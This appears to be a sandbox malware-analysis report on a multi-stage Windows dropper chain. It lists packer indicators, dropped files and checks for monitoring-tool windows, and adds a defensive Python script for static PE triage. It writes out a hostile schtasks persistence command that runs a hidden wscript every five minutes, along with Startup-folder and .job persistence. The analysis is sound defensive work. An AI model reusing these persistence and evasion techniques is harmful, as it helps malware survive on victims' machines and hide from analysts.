Source: Binary string: wntdll.pdbUGP source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: C:\Users\Admin\source\repos\Absolut\Absolut\obj\Release\Absolut.pdb source: pwHxMTy.exe, 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, pwHxMTy.exe, 0000002D.00000000.1699171423.0000000000FF2000.00000002.00000001.01000000.00000022.sdmp
Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475931194.000000006D681000.00000020.00000001.01000000.00000016.sdmp, SplashWin.exe, 00000011.00000003.1467481979.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1541298389.000000006CF71000.00000020.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, SplashWin.exe, 00000011.00000002.1475681626.000000006D601000.00000020.00000001.01000000.00000017.sdmp, SplashWin.exe, 00000012.00000002.1540622430.000000006CDA1000.00000020.00000001.01000000.0000001B.sdmp, SplashWin.exe, 00000030.00000002.1941370087.000000006CF11000.00000020.00000001.01000000.0000001B.sdmp

Data Obfuscation
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Unpacked PE file: 2.2.1E08u3.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; (section rights in memory vs. on disk: the unnamed first section is changed from ER to EW, i.e. the packer rewrites its own code section; the same pattern applies to the three lines below)
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 3.2.rapes.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW;
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 4.2.rapes.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ezfgyvbn:EW;ajpekoqk:EW;.taggant:EW;
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Unpacked PE file: 5.2.2R0700.exe.980000.0.unpack :EW;.rsrc:W;.idata :W;grsopbsh:EW;hjwgpcua:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;grsopbsh:EW;hjwgpcua:EW;.taggant:EW;
                               Source: T0QdO0l[1].exe.9.dr, SequentialStrategy.cs | .Net Code: CountStrategy System.AppDomain.Load(byte[]) (loads an assembly from an in-memory byte array, i.e. an in-process unpacker)
                               Source: T0QdO0l.exe.9.dr, SequentialStrategy.cs | .Net Code: CountStrategy System.AppDomain.Load(byte[])
                               Source: pwHxMTy[1].exe.9.dr | Static PE information: 0x8F8A52CD [Tue Apr 24 18:24:13 2046 UTC] (compile timestamp lies in the future, so it was forged or randomized)
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00FA202A
                               Source: initial sample | Static PE information: section where entry point is pointing to: .taggant (the packer's IEEE software taggant section holds the entry point, not .text)
                               Source: 9hUDDVk.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x6f27c0
                               Source: rapes.exe.2.dr | Static PE information: real checksum: 0x1e2152 should be: 0x1e8ddb
                               Source: DuiLib_u.dll.16.dr | Static PE information: real checksum: 0xda891 should be: 0xda31a
                               Source: T0QdO0l.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x15767d
                               Source: uvwnwebboksg.51.dr | Static PE information: real checksum: 0x0 should be: 0x118c1c
                               Source: 3E11p.exe.0.dr | Static PE information: real checksum: 0x1c2d55 should be: 0x1c2d87
                               Source: amnew[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x724e5
                               Source: pwHxMTy[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x66274
                               Source: ADFoyxP[1].exe.9.dr | Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
                               Source: packed.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x176c7d
                               Source: 2R0700.exe.1.dr | Static PE information: real checksum: 0x3210c2 should be: 0x3216f6
                               Source: han.19.dr | Static PE information: real checksum: 0x0 should be: 0x118c1c
                               Source: DuiLib_u.dll.17.dr | Static PE information: real checksum: 0xda891 should be: 0xda31a
                               Source: pwHxMTy.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x66274
                               Source: ADFoyxP.exe.9.dr | Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
                               Source: amnew.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x724e5
                               Source: 9hUDDVk[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x6f27c0
                               Source: T0QdO0l[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x15767d
                               Source: 1E08u3.exe.1.dr | Static PE information: real checksum: 0x1e2152 should be: 0x1e8ddb
                               Source: packed[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x176c7d
                               Source: 3E11p.exe.0.dr | Static PE information: section name: (empty)
                               Source: 3E11p.exe.0.dr | Static PE information: section name: .idata
                               Source: 3E11p.exe.0.dr | Static PE information: section name: (empty)
                               Source: 3E11p.exe.0.dr | Static PE information: section name: xsbgiknq
                               Source: 3E11p.exe.0.dr | Static PE information: section name: fhlnseet
                               Source: 3E11p.exe.0.dr | Static PE information: section name: .taggant
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: (empty)
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: .idata
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: (empty)
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: ezfgyvbn
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: ajpekoqk
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: .taggant
                               Source: 2R0700.exe.1.dr | Static PE information: section name: (empty)
                               Source: 2R0700.exe.1.dr | Static PE information: section name: .idata
                               Source: 2R0700.exe.1.dr | Static PE information: section name: grsopbsh
                               Source: 2R0700.exe.1.dr | Static PE information: section name: hjwgpcua
                               Source: 2R0700.exe.1.dr | Static PE information: section name: .taggant
                               Source: rapes.exe.2.dr | Static PE information: section name: (empty)
                               Source: rapes.exe.2.dr | Static PE information: section name: .idata
                               Source: rapes.exe.2.dr | Static PE information: section name: (empty)
                               Source: rapes.exe.2.dr | Static PE information: section name: ezfgyvbn
                               Source: rapes.exe.2.dr | Static PE information: section name: ajpekoqk
                               Source: rapes.exe.2.dr | Static PE information: section name: .taggant
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: (empty)
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: .rsrc
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: .idata
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: (empty)
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: hbloxsmk
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: bicjwbqp
                               Source: pwHxMTy[1].exe.9.dr | Static PE information: section name: .CSS
                               Source: pwHxMTy.exe.9.dr | Static PE information: section name: .CSS
                               Source: HmngBpR.exe.9.dr | Static PE information: section name: .didata (Delphi delay-import section; normal for a Delphi-built executable)
                               Source: HmngBpR[1].exe.9.dr | Static PE information: section name: .didata
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: (empty)
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: .rsrc
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: .idata
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: (empty)
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: hbloxsmk
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: bicjwbqp
                               Source: msvcp140.dll.16.dr | Static PE information: section name: .didat (MSVC delay-import data; standard in Microsoft's own CRT DLLs, so not an indicator by itself)
                               Source: msvcp140.dll.17.dr | Static PE information: section name: .didat
                               Source: han.19.dr | Static PE information: section name: .xyz
                               Source: han.19.dr | Static PE information: section name: hlvtkr
                               Source: uvwnwebboksg.51.dr | Static PE information: section name: .xyz
                               Source: uvwnwebboksg.51.dr | Static PE information: section name: hlvtkr
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA724D push ecx; ret 0_2_00FA7260
                               Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_0092724D push ecx; ret 1_2_00927260
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Code function: 2_2_04D90390 push 0000005Bh; retn 0008h 2_2_04D903A3
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Code function: 5_3_006A1251 push eax; iretd 5_3_006A1379
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Code function: 5_3_006A1737 push ds; iretd 5_3_006A173A
                               Source: 3E11p.exe.0.dr | Static PE information: section name: xsbgiknq entropy: 7.953699170235273
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: (empty) entropy: 7.977726294701571
                               Source: 1E08u3.exe.1.dr | Static PE information: section name: ezfgyvbn entropy: 7.953436126145147
                               Source: 2R0700.exe.1.dr | Static PE information: section name: (empty) entropy: 7.156207414551347
                               Source: rapes.exe.2.dr | Static PE information: section name: (empty) entropy: 7.977726294701571
                               Source: rapes.exe.2.dr | Static PE information: section name: ezfgyvbn entropy: 7.953436126145147
                               Source: bncn6rv.exe.9.dr | Static PE information: section name: hbloxsmk entropy: 7.954850446877664
                               Source: T0QdO0l[1].exe.9.dr | Static PE information: section name: .text entropy: 7.868855860119579
                               Source: T0QdO0l.exe.9.dr | Static PE information: section name: .text entropy: 7.868855860119579
                               Source: bncn6rv[1].exe.9.dr | Static PE information: section name: hbloxsmk entropy: 7.954850446877664
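The static indicators listed in this section (a zero or mismatched PE checksum, sections with random eight-letter names, section entropy close to 8, a writable and executable code section, the entry point inside .taggant, a 2046 compile timestamp) can all be reproduced offline from the file alone. The script below is an added example written for this page, not Joe Sandbox's or the malware's code; it uses only the Python standard library, and the PE it analyses is constructed inside the script with section names copied from the report, so it is not the actual sample. One caveat worth keeping in mind when reading the checksum lines above: a stored value of 0x0 only means the linker never wrote one, which is normal for many user-mode executables; a non-zero value that disagrees with the computed one means the file was modified after linking, which is the stronger signal.

```python
"""Static PE triage for the packer indicators above (checksum, section names, entropy,
entry-point section, EW sections, timestamp). Added example, not Joe Sandbox code;
standard library only. The PE it analyses is constructed at the bottom of the script."""
import math
import struct
from datetime import datetime, timezone

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                     ".pdata", ".tls", ".bss", ".didat"}


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """ImageHlp CheckSumMappedFile: one's-complement sum of the 16-bit words (skipping the
    4-byte CheckSum field itself), folded to 16 bits, plus the file length."""
    total, size = 0, len(data)
    data = data + b"\0" * (size & 1)                   # odd length: pad the last word
    for off in range(0, len(data), 2):
        if checksum_off <= off < checksum_off + 4:
            continue
        total += data[off] | (data[off + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    return (((total >> 16) + total) & 0xFFFF) + size


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally frequent (packed/encrypted)."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in (buf.count(b) for b in set(buf))) if n else 0.0


def parse_pe(data: bytes) -> dict:
    """Minimal PE32/PE32+ header walk: COFF header, optional header, section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    checksum_off = opt + 64                            # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "chars": chars,
                         "vsize": max(vsize, rawsize), "raw": data[rawptr:rawptr + rawsize]})
    return {"timestamp": timestamp, "entry": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "checksum_off": checksum_off, "sections": sections}


def triage(data: bytes, now=None) -> list:
    """Findings phrased like the report lines above; `now` overrides the clock for tests."""
    pe, findings = parse_pe(data), []
    computed = pe_checksum(data, pe["checksum_off"])
    if pe["checksum"] != computed:     # 0x0: linker never wrote one; other: changed after linking
        findings.append(f"real checksum: 0x{pe['checksum']:x} should be: 0x{computed:x}")
    if pe["timestamp"] > (datetime.now(timezone.utc).timestamp() if now is None else now):
        when = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
        findings.append(f"timestamp in the future: 0x{pe['timestamp']:08X} [{when:%Y-%m-%d %H:%M:%S} UTC]")
    entry_section = None
    for s in pe["sections"]:
        if s["va"] <= pe["entry"] < s["va"] + s["vsize"]:
            entry_section = s["name"]
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']!r}")
        if (ent := shannon_entropy(s["raw"])) > 7.0:
            findings.append(f"section {s['name']!r} entropy: {ent:.2f} (packed/encrypted)")
        if s["chars"] & 0x20000000 and s["chars"] & 0x80000000:   # IMAGE_SCN_MEM_EXECUTE + _WRITE
            findings.append(f"section {s['name']!r} is writable and executable (EW)")
    if entry_section != ".text":
        findings.append(f"section where entry point is pointing to: {entry_section}")
    return findings


def with_valid_checksum(data: bytes) -> bytes:
    """Write the computed checksum into the header, as a linker (or a repacker) would."""
    off = parse_pe(data)["checksum_off"]
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


def build_sample_pe(sections, entry_rva: int, timestamp: int) -> bytes:
    """Constructed minimal PE32 (not the real sample); sections = [(name, rva, raw, flags)]."""
    align = lambda n, a: (n + a - 1) // a * a
    hdr_len = align(0x40 + 4 + 20 + 224 + 40 * len(sections), 0x200)
    raws = [r + b"\0" * (align(len(r), 0x200) - len(r)) for _, _, r, _ in sections]
    size_of_image = align(max(s[1] + len(r) for s, r in zip(sections, raws)), 0x1000)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0,
                       0, size_of_image, hdr_len, 0, 2, 0x8140, 0x100000, 0x1000,
                       0x100000, 0x1000, 0, 16) + b"\0" * 128      # CheckSum 0, 16 empty directories
    table, ptr = b"", hdr_len
    for (name, rva, _, flags), raw in zip(sections, raws):
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), rva, len(raw), ptr,
                             0, 0, 0, 0, flags)
        ptr += len(raw)
    header = dos + b"PE\0\0" + coff + opt + table
    return header + b"\0" * (hdr_len - len(header)) + b"".join(raws)


# Constructed sample mirroring the report: plain code, a high-entropy EW blob, entry in .taggant.
SAMPLE_SECTIONS = [(".text", 0x1000, b"\x55\x8B\xEC\x5D\xC3" * 40, 0x60000020),
                   ("ezfgyvbn", 0x2000, bytes(range(256)) * 2, 0xE0000020),
                   (".taggant", 0x3000, b"\xEB\xFE" + b"\0" * 30, 0xE0000020)]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS, entry_rva=0x3000, timestamp=0x8F8A52CD)
```

Running `triage(SAMPLE_PE)` yields the same kind of lines as the report: a checksum mismatch, the 2046 timestamp, the random section name with entropy 8.00 and EW rights, and the entry point in .taggant, while .text produces nothing. `with_valid_checksum` shows what the "should be" value is: once written back, the checksum finding disappears, which is exactly what a repacker that bothers to fix the header would achieve, so checksum alone should never be the only signal.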

                              Persistence and Installation Behavior

                               Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com
                               Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\353090\Seat.com
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe
                               Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | File created: C:\Users\user\AppData\Roaming\Dockerprotectysd\DuiLib_u.dll
                               Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | File created: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe
                               Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | File created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\DuiLib_u.dll
                               Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\HmngBpR[1].exe
                               Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | File created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\msvcp140.dll
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exe
                               Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exe
                               Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | File created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exe
                               Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\uvwnwebboksg
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\packed[1].exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\ADFoyxP[1].exe
                               Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | File created: C:\Users\user\AppData\Roaming\Dockerprotectysd\msvcp140.dll
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exe
                               Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pwHxMTy[1].exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10123540101\packed.exe
                               Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe | File created: C:\Users\user\AppData\Roaming\Dockerprotectysd\vcruntime140.dll
                               Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe | File created: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\vcruntime140.dll
                               Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\han
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exe
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exe
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\9hUDDVk[1].exe
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Code function: 0_2_00FA1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00FA1AE8
                               Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Code function: 1_2_00921AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 1_2_00921AE8

                              Boot Survival

                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Window searched: window name: FilemonClass (FindWindow checks for the Sysinternals Filemon, Process Monitor and Regmon windows before the payload runs; the same check is repeated by the other stages below)
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Window searched: window name: RegmonClass
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: FilemonClass
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: RegmonClass
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Window searched: window name: FilemonClass
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Window searched: window name: RegmonClass
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Window searched: window name: Regmonclass
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exe | Window searched: window name: Filemonclass
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: Regmonclass
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window searched: window name: Filemonclass
                               Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F (wscript //B runs the script in batch mode with no UI; /sc minute /mo 5 re-launches it every five minutes, and /F silently overwrites any existing task of that name)
                               Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url (per-user Startup folder; a .url shortcut there is launched at every logon)
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | File created: C:\Windows\Tasks\rapes.job (legacy Task Scheduler 1.0 job file, written without going through schtasks)
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 (written by the IExpress/wextract self-extractor to delete its IXP000.TMP directory at the next logon; it identifies the dropper as an SFX archive rather than adding persistence of its own)
                               Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup1 (second, nested SFX layer; cleans up IXP001.TMP)
